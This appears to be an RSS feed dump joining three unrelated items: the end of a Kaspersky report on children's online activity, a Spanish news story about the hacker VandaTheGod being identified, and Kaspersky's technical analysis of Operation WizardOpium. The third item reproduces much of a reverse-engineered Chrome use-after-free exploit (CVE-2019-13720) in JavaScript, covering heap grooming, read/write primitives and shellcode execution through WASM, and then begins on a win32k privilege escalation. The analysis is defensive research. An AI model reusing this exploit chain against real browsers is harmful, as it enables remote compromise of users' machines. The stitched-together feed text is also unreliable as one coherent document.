Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids all around the world started visiting gaming sites less frequently, though. This can be explained by added activity in the form of school lessons, which relocated into the home due to the pandemic. Interestingly, the share of Video Games began to decline among Windows users starting in the fall of 2019.

While North America, Europe and Oceania did not show increased activity in Internet Communications and Software, Audio, Video, these regions had the highest shares of Video Games activity.

Kaspersky Safe Kids alerts distribution for Video Games by region in June 2019 through May 2020 (download)

According to our statistics, the UK had the highest proportion of children interested in games with 23.94 percent, followed by the US with 21.61 percent and Australia with 20.94 percent. The most popular Video Games sites in the UK and the US were blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com and crazygames.com. Australia’s most popular sites in the category were roblox.com and a variety of Minecraft message boards.

Kaspersky Safe Kids alerts distribution for Video Games by country in June 2019 through May 2020 (download)

E-Commerce

E-Commerce is another category where we observed increased activity throughout the year.

Kaspersky Safe Kids alerts distribution for E-Commerce in June 2019 through May 2020 (download)

The October 2019 peak, as we said earlier, was associated with a disruption in percentage shares across categories on all platforms due to a malfunction in the new macOS. But, in November and December, kids’ interest in online shopping was also higher than in the other months. Which is not surprising: November is the time of the Black Friday sales around the world, and December typically sees everyone busy picking Christmas and New Year’s presents.

Kaspersky Safe Kids alerts distribution for E-Commerce on Windows and macOS in June 2019 through May 2020 (download)

Children who used macOS spent much more hours looking at online shopping windows than their peers who used Windows.

Kaspersky Safe Kids alerts distribution for E-Commerce by region in June 2019 through May 2020 (download)

Children in Europe, North America and Oceania visited online stores and showed interest in shopping more frequently than others. The CIS, Asia and Latin America showed the lowest activity rates in the world.

Kaspersky Safe Kids alerts distribution for E-Commerce by country in June 2019 through May 2020 (download)

The leaders by share of visits to online stores were children in Germany (19.51 percent), the UAE (17.22 percent) and Canada (15.86 percent). The lowest figure was recorded in Kazakhstan (4.60 percent) and Egypt (5.18 percent).

The most visited sites in Germany were amazon.de, otto.de, ebay.com; in the UAE, amazon.ae, panemirates.com, amazon.com and luluhypermarket.com; and in Canada, amazon.ca, visions.ca and bestbuy.ca.

News

Not just adults, but kids, too, showed interest in news, especially in light of recent events. The number of children’s visits to news websites grew around the world as coverage of the pandemic began. The peak (7.26 percent) fell on March, when most children were switched to distance learning.

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Windows users, in general, showed more interest in news than those who used macOS. However, in February, the figure for macOS (7.25 percent) was higher than that for Windows (6.75 percent).

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Kaspersky Safe Kids alerts distribution for News by region in June 2019 through May 2020 (download)

The largest share of News among Safe Kids users was recorded in Europe (11.11 percent), where the most active news-reading countries were the UK (14.14 percent), Germany (12.75 percent), France (10.97 percent) and Italy (10.25 percent). The lowest rate was recorded in the CIS (3.17 percent) and Africa (3.96 percent).

Kaspersky Safe Kids alerts distribution for News by country in June 2019 through May 2020 (download)

Interest in news peaked in the UK and in Italy at in February. Think of the fact that the transition to distance learning in these two countries took place in late February, whereas Germany and France went through the transition in early March, and interest in news there peaked in March, too.

Adult content

Kids were interested in adult content to a lesser extent. According to the global statistics, the popularity of this category peaked in January 2020 (1.12 percent), followed by a decline to the annual average.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

That said, macOS users showed greater interest in pornography than Windows users.

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

Though in 2019 Windows accounted for a higher percentage of alerts, the trend changed at the beginning of 2020.

Kaspersky Safe Kids alerts distribution for Adult Content by region in June 2019 through May 2020 (download)

The CIS and Europe had the largest share of users who showed interest in Adult Content: 1.07 percent and 0.83 percent, respectively. The lowest rates were recorded in the Arab world (0.18 percent) and Oceania (0.24 percent).

However, the distribution by country shows that children in Mexico had the highest interest in Adult Content: 1.72 percent.

Kaspersky Safe Kids alerts distribution for Adult Content by country in June 2019 through May 2020 (download)

They were followed by children in Russia (1.06 percent) and France (0.95 percent). Children in China were least likely to access Adult Content on desktop computers: 0.04 percent.

Summary

The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop, rather than impede their development. Online education, and communication with friends and relatives are all made possible only through technology developed in recent decades, which have become not just a day-to-day assistant, but a lifeline in times when leaving home and making personal contact can pose a health threat.

Data for recent months shows that children who are staying at home with constant access to the computer primarily chat and watch videos. And those are not necessarily just entertaining videos: there might be educational content amid that stream of YouTube clips.

This year, we noticed an interesting trend: children who use different operating systems diverge in their online behaviors. Kids who use macOS spend more time in online stores, show slightly more interest in adult content, chat more online and less frequently visit gaming sites. Windows users show greater interest in games and news, and visit websites with video and audio content more frequently.

We have also learned that children, like adults, pay attention to the news when the situation in the world concerns them directly. So, in the month when various countries were expecting to switch to distance learning, kids started to follow the situation closer by going to news sites.

Today’s children, who start interacting with technology at an early age, find moving all of their day-to-day activities online much easier than adults, and they are better adapted to situations where going outside could be life-threatening. Adults tend to question certain online activity, such as communications, but in a world where it is the only safe means of social contact, comes the realization that there may be more to it!

Contributor:
Copyright:
Category: Featured
Date: Wed, 03 Jun 2020 10:00:15 +0000
Local date: Wed, 03 Jun 2020 10:00:15 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Investigadores aprovechan un descuido en las redes sociales para identificar y rastrear a VandaTheGod, un hacker que había atacado más de 4.800 páginas web.
Author: Securelist
Link :
Email :
Description: Un reconocido cibercriminal y activista digital que se había mantenido oculto por años ha sido identificado y rastreado por expertos en seguridad a través de sus publicaciones descuidadas en redes sociales.
Full content:

no-image

Un reconocido cibercriminal y activista digital que se había mantenido oculto por años ha sido identificado y rastreado por expertos en seguridad a través de sus publicaciones descuidadas en redes sociales.

Las investigaciones estuvieron lideradas por la empresa de seguridad Check Point, a pedido de autoridades gubernamentales que no han sido especificadas. “Iniciamos todo este proceso de investigación cuando recibimos una solicitud de un gobierno para que le ayudemos a descubrir su identidad real”, explicó Loten Finkelsteen, de Check Point.

El hacker, conocido en Internet como “VandaTheGod”, comenzó a ganar notoriedad en 2013 como activista digital, pero con el tiempo se convirtió en un reconocido cibercriminal. Como activista, atacaba sitios web de diferentes gobiernos con mensajes que denunciaban corrupción e injusticias sociales. De este modo, atacó los sitios web de países como Brasil, República Dominicana, Argentina, Nueva Zelanda, Trinidad y Tobago, Vietnam y Tailandia.

Sin ir más lejos, durante los incendios de la Amazonía el año pasado, VandaTheGod atacó la página web del gobierno de Brasil para que muestre el hashtag “#PrayForAmazonia”, junto a un mensaje en portugués que acusaba al presidente Jair Bolsonaro de ser cómplice de la tragedia.

El hacker aprovechó la atención que estaba recibiendo para ponerse una nueva meta: atacar 5.000 sitios web. Al intentar cumplirla, amplió su rango de víctimas para incluir más de 40 países, afectando en su mayoría a Estados Unidos, Australia y Holanda. Y casi lo logra: hasta la fecha, asegura que ha irrumpido en 4.820 sitios web.

A partir de allí, comenzó a intercalar sus discursos sociales con ataques cibercriminales. Mediante ataques a sitios web de figuras y entidades públicas, comenzó a dedicar sus esfuerzos y conocimientos para robar datos personales y de tarjetas de crédito de los internautas. “Mientras más expandía sus actividades, más lo podíamos ver desarrollar nuevas capacidades y mostrar su interés en nuevos campos del cibercrimen”, indicó Finkelsteen.

Entre sus víctimas hubo universidades, actrices, instituciones gubernamentales, compañías privadas, etc. En uno de sus últimos ataques, en octubre de 2019, robó los registros médicos de 1 millón de pacientes de Nueva Zelanda y los puso a la venta por 200 dólares cada uno.

Los investigadores de CheckPoint explicaron que, al rastrear la información WHOIS de la página web del hacker -VandaTheGod.com-, descubrieron una cuenta de correo electrónico que también era la que se había usado para registrar el sitio del grupo de hackers brasileros Brazilian Cyber Army.

Pero esto no fue todo: el hacker también había subido capturas de pantalla a Twitter que revelaron su cuenta de Facebook. A partir de allí, pudieron deducir su nombre y corroborar que tanto las fotos de la casa que se mostraban en la cuenta de Facebook del individuo como las que se había publicado en las redes de Vanda The God pertenecían a la misma persona.

“Al final pudimos conectar con certeza la identidad de VandaTheGod con la de un individuo brasileño en particular de la ciudad de Uberlândia, y derivamos los resultados de nuestra investigación con las autoridades para que puedan llevar a cabo las acciones correspondientes”, indicó Check Point.

Fuentes
How one hacktivist became a full-fledged cybercriminal • Tech Republic
Menacing Super-Hacker Exposed: 1 Million Stolen Identities, 1 Stupid Facebook Mistake • Forbes
Researchers Uncover Brazilian Hacktivist’s Identity Who Defaced Over 4800 Sites • The Hacker News

Contributor:
Copyright:
Category: News
Date: Tue, 02 Jun 2020 14:47:45 +0000
Local date: Tue, 02 Jun 2020 14:47:45 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: px
itemImageHeight: px
The zero-day exploits of Operation WizardOpium
Author: Boris Larin
Link :
Email :
Description: Back in October 2019 we detected a classic watering-hole attack that exploited a chain of Google Chrome and Microsoft Windows zero-days. In this blog post we’d like to take a deep technical dive into the attack.
Full content:

Back in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we’ve already published blog posts briefly describing this operation (available here and here), in this blog post we’d like to take a deep technical dive into the exploits and vulnerabilities used in this attack.

Google Chrome remote code execution exploit

In the original blog post we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following commit. A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:

if (!buffer) {
+	BaseAudioContext::GraphAutoLocker context_locker(Context());
+	MutexLocker locker(process_lock_);
 	reverb_.reset();
 	shared_buffer_ = nullptr;
 	return;

As you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.

class MODULES_EXPORT ConvolverHandler final : public AudioHandler {
...
  std::unique_ptr<Reverb> reverb_;
  std::unique_ptr<SharedAudioBuffer> shared_buffer_;
...

These objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.

The exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the PartitionAlloc memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from partition_alloc_constants.h:

function getSuperPageBase(addr) {
	let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
	let superPageBaseMask = ~superPageOffsetMask;
	let superPageBase = addr & superPageBaseMask;
	return superPageBase;
}
 
function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {
	let superPageBase = getSuperPageBase(addr);
	let partitionPageBase = partitionPageIndex << BigInt(14);
	let finalAddr = superPageBase + partitionPageBase;
	return finalAddr;
}
 
function getPartitionPageIndex(addr) {
	let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
	let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
	return partitionPageIndex;
}
 
function getMetadataAreaBaseFromPartitionSuperPage(addr) {
	let superPageBase = getSuperPageBase(addr);
	let systemPageSize = BigInt(0x1000);
	return superPageBase + systemPageSize;
}
 
function getPartitionPageMetadataArea(addr) {
	let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
	let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
	let pageMetadataSize = BigInt(0x20);
	let partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;
	return partitionPageMetadataPtr;
}

It’s interesting that the exploit also uses the relatively new built-in BigInt class to handle 64-bit values; authors usually use their own primitives in exploits.

At first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.

let gcPreventer = [];
let iirFilters = [];
 
function initialSetup() {
	let audioCtx = new OfflineAudioContext(1, 20, 3000);
 
	let feedForward = new Float64Array(2);
	let feedback = new Float64Array(1);
 
	feedback[0] = 1;
	feedForward[0] = 0;
	feedForward[1] = -1;
 
	for (let i = 0; i < 256; i++)
        iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));
}

After that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects – ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.

async function triggerUaF(doneCb) {
	let audioCtx = new OfflineAudioContext(2, 0x400000, 48000);
	let bufferSource = audioCtx.createBufferSource();
	let convolver = audioCtx.createConvolver();
	let scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);
	let channelBuffer = audioCtx.createBuffer(1, 1, 48000);
 
	convolver.buffer = channelBuffer;
	bufferSource.buffer = channelBuffer;
 
	bufferSource.loop = true;
	bufferSource.loopStart = 0;
	bufferSource.loopEnd = 1;
 
	channelBuffer.getChannelData(0).fill(0);
 
	bufferSource.connect(convolver);
	convolver.connect(scriptNode);
	scriptNode.connect(audioCtx.destination);
 
	bufferSource.start();
 
	let finished = false;
 
	scriptNode.onaudioprocess = function(evt) {
    		let channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);
 
    		for (let j = 0; j < channelDataArray.length; j++) {
        		if (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {
            			let u64Array = new BigUint64Array(1);
            			let u32Array = new Uint32Array(u64Array.buffer);
            			u32Array[0] = channelDataArray[j + 0];
            			u32Array[1] = channelDataArray[j + 1];
 
            			let leakedAddr = byteSwapBigInt(u64Array[0]);
            			if (leakedAddr >> BigInt(32) > BigInt(0x8000))
                			leakedAddr -= BigInt(0x800000000000);
             			let superPageBase = getSuperPageBase(leakedAddr);
 
	             		if (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {
                			finished = true;
                			evt = null;
 
                			bufferSource.disconnect();
                			scriptNode.disconnect();
                			convolver.disconnect();
 
                			setTimeout(function() {
                     			doneCb(leakedAddr);
                			}, 1);
 
                			return;
            			}
        		}
    		}
	};
 
	audioCtx.startRendering().then(function(buffer) {
    		buffer = null;
 
    		if (!finished) {
        	 	finished = true;
       	  	triggerUaF(doneCb);
    		}
	});
 
	while (!finished) {
    		convolver.buffer = null;
    		convolver.buffer = channelBuffer;
    		await later(100); // wait 100 millseconds
	}
};

This function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:

function later(delay) {
	return new Promise(resolve => setTimeout(resolve, delay));
}

During execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.

The PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:

function byteSwapBigInt(x) {
	let result = BigInt(0);
	let tmp = x;
 
	for (let i = 0; i < 8; i++) {
    		result = result << BigInt(8);
    		result += tmp & BigInt(0xFF);
    		tmp = tmp >> BigInt(8);
	}
 
	return result;
}

The exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function initialUAFCallback.

let sharedAudioCtx;
let iirFilterFeedforwardAllocationPtr;
 
function initialUAFCallback(addr) {
	sharedAudioCtx = new OfflineAudioContext(1, 1, 3000);
 
	let partitionPageIndexDelta = undefined;
	switch (majorVersion) {
    		case 77: // 77.0.3865.75
        	 	partitionPageIndexDelta = BigInt(-26);
        	break;
    		case 76: // 76.0.3809.87
         		partitionPageIndexDelta = BigInt(-25);
      	   	break;
	}
 
	iirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);
 
    triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);
}

The exploit uses the leaked pointer to get the address of the raw pointer to the feedforward_ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.

The vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.

let floatArray = new Float32Array(10);
let audioBufferArray1 = [];
let audioBufferArray2 = [];
let imageDataArray = [];
 
async function triggerSecondUAF(addr, doneCb) {
	let counter = 0;
	let numChannels = 1;
 
	let audioCtx = new OfflineAudioContext(1, 0x100000, 48000);
 
	let bufferSource = audioCtx.createBufferSource();
	let convolver = audioCtx.createConvolver();
 
	let bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);
	let smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);
 
	smallAudioBuffer.getChannelData(0).fill(0);
 
	for (let i = 0; i < numChannels; i++) {
    		let channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);
    		channelDataArray[0] = addr;
	}
 
	bufferSource.buffer = bigAudioBuffer;
	convolver.buffer = smallAudioBuffer;
 
	bufferSource.loop = true;
	bufferSource.loopStart = 0;
	bufferSource.loopEnd = 1;
 
	bufferSource.connect(convolver);
	convolver.connect(audioCtx.destination);
 
	bufferSource.start();
 
	let finished = false;
 
     	audioCtx.startRendering().then(function(buffer) {
     		buffer = null;
 
    		if (finished) {
        		audioCtx = null;
 
        		setTimeout(doneCb, 200);
        		return;
    		} else {
        		finished = true;
 
        		setTimeout(function() {
             		triggerSecondUAF(addr, doneCb);
        		}, 1);
    		}
	});
 
	while (!finished) {
    		counter++;
 
    		convolver.buffer = null;
 
    		await later(1); // wait 1 millisecond
 
    		if (finished)
         		break;
 
    		for (let i = 0; i < iirFilters.length; i++) {
        		floatArray.fill(0);
          	   iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);
 
         		if (floatArray[0] != 3.1415927410125732) {
             			finished = true;
 
             	     		audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));
                 		audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));
 
            			bufferSource.disconnect();
            			convolver.disconnect();
 
            			return;
        		}
    		}
 
    		convolver.buffer = smallAudioBuffer;
 
    		await later(1); // wait 1 millisecond
	}
}

This time the exploit uses the function getFrequencyResponse() to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.

void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,
                                    	const float* frequency_hz,
                                    	float* mag_response,
                                    	float* phase_response) {
...
  Vector<float> frequency(n_frequencies);
  double nyquist = this->Nyquist();
  // Convert from frequency in Hz to normalized frequency (0 -> 1),
  // with 1 equal to the Nyquist frequency.
  for (int k = 0; k < n_frequencies; ++k)
	frequency[k] = frequency_hz[k] / nyquist;
...

If the resulting array contains a value other than π, it means exploitation was successful. If that’s the case, the exploit stops its recursion and executes the function finalUAFCallback to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.

async function finalUAFCallback() {
	for (let i = 0; i < 256; i++) {
    		floatArray.fill(0);
 
         	iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);
 
    		if (floatArray[0] != 3.1415927410125732) {
        		await collectGargabe();
 
        		audioBufferArray2 = [];
 
        		for (let j = 0; j < 80; j++)
                 		audioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));
 
        		iirFilters = new Array(1);
    	     		await collectGargabe();
 
        		for (let j = 0; j < 336; j++)
            			imageDataArray.push(new ImageData(1, 2));
        		imageDataArray = new Array(10);
        		await collectGargabe();
 
        		for (let j = 0; j < audioBufferArray1.length; j++) {
            			let auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);
            			if (auxArray[0] != BigInt(0)) {
                			kickPayload(auxArray);
                			return;
            			}
             		}
 
        		return;
    		}
	}
}

Heap defragmentation is performed with multiple calls to the improvised collectGarbage function that creates a huge ArrayBuffer in a loop.

function collectGargabe() {
	let promise = new Promise(function(cb) {
    		let arg;
    		for (let i = 0; i < 400; i++)
        		new ArrayBuffer(1024 * 1024 * 60).buffer;
    		cb(arg);
	});
	return promise;
}

After those steps, the exploit executes the function kickPayload() passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray’s data.

async function kickPayload(auxArray) {
	let audioCtx = new OfflineAudioContext(1, 1, 3000);
	let partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));
	auxArray[0] = byteSwapBigInt(partitionPagePtr);
	let i = 0;
	do {
    		gcPreventer.push(new ArrayBuffer(8));
    		if (++i > 0x100000)
        		return;
	} while (auxArray[0] != BigInt(0));
	let freelist = new BigUint64Array(new ArrayBuffer(8));
	gcPreventer.push(freelist);
	...

The exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.

function read64(rwHelper, addr) {
	rwHelper[0] = addr;
	var tmp = new BigUint64Array;
	tmp.buffer;
	gcPreventer.push(tmp);
	return byteSwapBigInt(rwHelper[0]);
}
 
function write64(rwHelper, addr, value) {
	rwHelper[0] = addr;
	var tmp = new BigUint64Array(1);
	tmp.buffer;
	tmp[0] = value;
	gcPreventer.push(tmp);
}

After the building of the arbitrary read/write primitives comes the final stage – executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a “dummy” WASM module and it results in the allocation of memory pages for JIT compiled code.

const wasmBuffer = new Uint8Array([...]);
const wasmBlob = new Blob([wasmBuffer], {
	type: "application/wasm"
});
 
const wasmUrl = URL.createObjectURL(wasmBlob);
var wasmFuncA = undefined;
WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {
	wasmFuncA = result.instance.exports.a;
});

To execute the exported function wasmFuncA, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the getPartitionPageFreeListHeadEntryBySlotSize() function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.

let fileReader = new FileReader;
let fileReaderLoaderSize = 0x140;
let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);
if (!fileReaderLoaderPtr)
	return;
 
fileReader.readAsArrayBuffer(new Blob([]));
 
let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);
if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)
	return;

The exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.

fileReader.onerror = wasmFuncA;
 
let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);
 
let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));
let registeredEventListenerPtr = read64(freelist, vectorPtr);
let eventListenerPtr = read64(freelist, registeredEventListenerPtr);
let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));
let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));
 
let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);
let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);
let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);
let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);
 
let stubAddrFieldOffset = undefined;
switch (majorVersion) {
	case 77:
    		stubAddrFieldOffset = BigInt(0x8) * BigInt(16);
	break;
	case 76:
    		stubAddrFieldOffset = BigInt(0x8) * BigInt(17);
	break
}
 
let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);

The variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it’s sufficient to overwrite it with shellcode. To do so, the exploit uses the function getPartitionPageFreeListHeadEntryBySlotSize() again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.

let arrayBufferSize = 0x20;
let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);
if (!arrayBufferPtr)
	return;
 
let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);
gcPreventer.push(audioBuffer);

The exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.

let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));
 
write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);
write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));

Now all that’s needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.

let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);
payloadArray.set(shellcode, 0);
payloadArray.set(peBinary, shellcode.length);

To prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.

write64(freelist, partitionPagePtr, BigInt(0));

Now, in order to execute the shellcode, it’s enough to call the exported WASM function.

try {
	wasmFuncA();
} catch (e) {}

Microsoft Windows elevation of privilege exploit

The shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome’s sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That’s quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It’s also important to note that Google Chrome has a special security feature called Win32k lockdown. This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it’s fair to assume that Operation WizardOpium targeted users running Windows 7.

CVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there’s a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It’s worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There’s a common issue when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.

xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)
	...
	if ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )
		...
		extraData = (BYTE*)tagWND + sizeof(tagWND) + index
		old = *(QWORD*)extraData;
		*(QWORD*)extraData = data;
		return old;

A check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.

Triggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.

